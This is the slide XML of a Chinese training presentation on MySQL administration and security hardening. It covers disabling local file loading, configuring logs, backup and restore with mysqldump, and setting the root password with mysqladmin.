            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1168400" y="2531745"/>
            <a:ext cx="7098030" cy="37064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本地文件读取保护</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094105" y="1226820"/>
            <a:ext cx="10175240" cy="1463040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>为防止用户读取服务器上的本地文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>防止MySQL使用“LOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t> DATA LOCAL INFILE”读取主机上的文件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>vim /etc/my.cnf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>set-variable=local-infile=0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094105" y="2876577"/>
            <a:ext cx="7019290" cy="19621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日志功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094105" y="1226820"/>
            <a:ext cx="10175240" cy="3693319"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>有以下几种日志：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>错误日志： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log-err</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查询日志： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可选）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>慢查询日志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>: -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log-slow-queries （</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>可选）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>更新日志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>: -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log-update</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>二进制日志： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>log-bin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的安装目录下，打开 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>my.ini,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在后面加上上面的参数，保存后重启</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>服务就行了。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>检查操作</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>my.cnf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>文件，查看是否包含如下配置：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysqld</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Log=filename</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1336152" y="5167377"/>
            <a:ext cx="5725840" cy="897245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="177319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数据库的备份</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094105" y="1226820"/>
            <a:ext cx="10175240" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）．直接备份数据库所在的目录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>tar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等命令直接备份数据库所存放的目录</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>．使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>mysqldump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>命令备份和恢复</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>mysqldump -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>用户名 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-p [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>密码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>选项</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>] [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>] &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>备份路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>备份文件名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2" descr="wKiom1fpIYijWo0HAAB1MjYlm3M5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022" y="2871572"/>
            <a:ext cx="6162675" cy="332422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788903" y="3286443"/>
            <a:ext cx="4821119" cy="2011794"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1548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数据库的恢复</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1094105" y="1226820"/>
            <a:ext cx="10175240" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>mysql -u root -p [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>数据库名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>] &lt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>备份路径</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>备份文件名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="wKioL1fpIazg1pg6AAAQKkFLykQ6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431" y="2420043"/>
            <a:ext cx="6796615" cy="101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05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0955" y="2789555"/>
            <a:ext cx="4366895" cy="921385"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="5400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2BBB99"/>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw blurRad="38100" dist="25400" dir="5400000" algn="ctr" rotWithShape="0">
                    <a:srgbClr val="6E747A">
                      <a:alpha val="43000"/>
                    </a:srgb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矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1522730" y="0"/>
            <a:ext cx="3493770" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2BBB99"/>
          </a:solid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endParaRPr lang="zh-CN" altLang="en-US" sz="1800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3076" name="椭圆 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716780" y="2362200"/>
            <a:ext cx="575945" cy="576580"/>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3077" name="椭圆 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4716780" y="3913505"/>
            <a:ext cx="575945" cy="576580"/>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
        <p:nvSpPr>
          <p:cNvPr id="3079" name="文本框 18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2690495" y="247650"/>
            <a:ext cx="1739900" cy="106172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6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                <a:ea typeface="华文中宋" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="2BBB99"/>
              </a:solidFill>
              <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              <a:ea typeface="华文中宋" pitchFamily="2" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3081" name="文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200775" y="2402205"/>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sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>基本操作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3082" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6200775" y="3913505"/>
            <a:ext cx="3938905" cy="53848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a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>MySQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全加固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3937000" y="2628900"/>
            <a:ext cx="4127500" cy="723900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="4000" b="1" i="0" kern="700" spc="-110" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="accent1">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst>
                  <a:outerShdw dist="38100" dir="5400000" algn="t" rotWithShape="0">
                    <a:schemeClr val="bg1">
                      <a:alpha val="84000"/>
                    </a:schemeClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2BBB99"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MySQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2BBB99"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基本操作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3937000" y="3370580"/>
            <a:ext cx="1376680" cy="47625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="358CC1"/>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2" name="矩形 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5313680" y="3370580"/>
            <a:ext cx="1374775" cy="47625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2BBB9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3" name="矩形 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6688455" y="3370580"/>
            <a:ext cx="1376045" cy="47625"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="A4C37B">
              <a:lumMod val="75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为初始安装的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>设置登录密码并登录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1222375" y="1123768"/>
            <a:ext cx="10175240" cy="3139321"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr dirty="0" err="1"/>
              <a:t>使用MySQL自带的命令mysqladmin设置root密码</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t># mysqladmin -u root password "123456.."</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>使用mysqladmin命令更改root密码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t># mysqladmin -u root -p123456.. password "1234567.."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>			         </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0"/>
              <a:t>旧密码	         新密码</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" dirty="0"/>
              <a:t>登录</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>MySQL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	#mysql -u root -p</a:t>
            </a:r>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rcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2798444" y="3416819"/>
            <a:ext cx="6152515" cy="2628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数据库管理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="表格 4"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2427097624"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="686335" y="1022409"/>
          <a:ext cx="6474318" cy="2973977"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="3237159">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3301189858"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="3237159">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1491074514"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="457535">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
                        <a:t>MySQL</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                          <a:effectLst/>
                          <a:latin typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                          <a:ea typeface="宋体" panose="02010600030101010101" pitchFamily="2" charset="-122"/>
                        </a:rPr>
